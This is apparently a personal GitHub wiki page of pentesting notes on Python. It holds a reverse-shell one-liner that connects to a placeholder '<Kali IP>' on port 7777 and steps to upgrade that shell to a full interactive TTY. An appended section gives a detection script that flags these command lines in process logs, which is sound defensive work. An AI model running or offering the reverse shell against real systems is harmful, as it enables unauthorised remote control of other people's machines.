Python
Alvin Smith edited this page Aug 7, 2021 · 18 revisions
This automatically creates a virtual environment, installs the package, and adds the package's associated applications (entry points) to a location on your PATH. For example, pipx install pycowsay makes the pycowsay command available globally, but sandboxes the pycowsay package in its own virtual environment. pipx never needs to run as sudo to do this.
https://github.com/pypa/pipx
https://github.com/A1vinSmith/arbitrary-python
python -m SimpleHTTPServer 80
python3 -m http.server
The default port is 8000
- Set up another netcat listener for the command below.
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<Kali IP>",7777));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
- However, this shell still won’t do what we want it to, so we need to get a full TTY for an interactive shell.
python -c 'import pty; pty.spawn("/bin/bash")'
or
python3 -c 'import pty; pty.spawn("/bin/bash")'
- If phase 2 does not get the job done (Python spawns a better-featured bash shell, but you still won’t be able to use tab autocomplete or the arrow keys, and Ctrl + C will still kill the shell):
export TERM=xterm # gives us access to term commands such as clear
- Press CTRL+Z to put the shell in the background. Next, type this command in the same window:
stty raw -echo;fg
This will bring your shell back to the foreground with a fully interactive experience. This does two things: first, it turns off our own terminal echo (which gives us access to tab autocompletes, the arrow keys, and Ctrl + C to kill processes). It then foregrounds the shell, thus completing the process.
PS: Note that if the shell dies, any input in your own terminal will not be visible (as a result of having disabled terminal echo). To fix this, type reset and press Enter.
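The one-liners on this page leave recognizable process command lines, which is what a defender can hunt for. The following is an added example, not part of the original wiki page: it flags the socket/dup2 shell, the pty.spawn upgrade and the ad-hoc HTTP server in process-creation records. The `pid= user= cmd=` record format, the rule names and the sample records are constructed for illustration.

```python
import re
# Rule name -> patterns that must ALL match one process command line.
RULES = {
    "python-socket-shell": [          # socket + dup2 onto fds 0-2 + shell
        r"\bpython[0-9.]*\b.*\s-c\s",
        r"socket\.socket\(",
        r"os\.dup2\(\s*\w+\.fileno\(\)\s*,\s*[012]\s*\)",
        r"/bin/(ba)?sh",
    ],
    "python-pty-spawn": [             # TTY upgrade via pty.spawn
        r"\bpython[0-9.]*\b.*\s-c\s",
        r"pty\.spawn\(\s*[\"']/bin/(ba)?sh[\"']",
    ],
    "python-adhoc-http-server": [     # quick file server from the CLI
        r"\bpython[0-9.]*\b.*\s-m\s+(SimpleHTTPServer|http\.server)\b",
    ],
}
COMPILED = {name: [re.compile(p) for p in pats] for name, pats in RULES.items()}
RECORD = re.compile(r"pid=(\d+) user=(\S+) cmd=(.*)$")  # constructed log format

def classify(cmdline):
    """Return the sorted names of rules whose patterns all match cmdline."""
    return sorted(n for n, pats in COMPILED.items()
                  if all(p.search(cmdline) for p in pats))

def scan(records):
    """Return (pid, user, rules) for every record matching at least one rule."""
    hits = []
    for line in records:
        m = RECORD.match(line)
        if m and (rules := classify(m.group(3))):
            hits.append((int(m.group(1)), m.group(2), rules))
    return hits

# Constructed sample records; 192.0.2.10 is a documentation address.
SAMPLE = [
    "pid=4102 user=www-data cmd=python -c 'import socket,subprocess,os;"
    "s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);"
    "s.connect((\"192.0.2.10\",7777));os.dup2(s.fileno(),0); "
    "os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);"
    "p=subprocess.call([\"/bin/sh\",\"-i\"]);'",
    "pid=4110 user=www-data cmd=python3 -c 'import pty; pty.spawn(\"/bin/bash\")'",
    "pid=4200 user=alice cmd=python3 -m http.server",
    "pid=4300 user=alice cmd=python3 -c 'import socket; print(socket.gethostname())'",
]

if __name__ == "__main__":
    for pid, user, rules in scan(SAMPLE):
        print(pid, user, ",".join(rules))
```

Command-line matching only catches the literal forms shown on this page, so treat a hit as a starting signal to correlate with process ancestry (for example, a web-server account spawning an interpreter) and outbound connection logs.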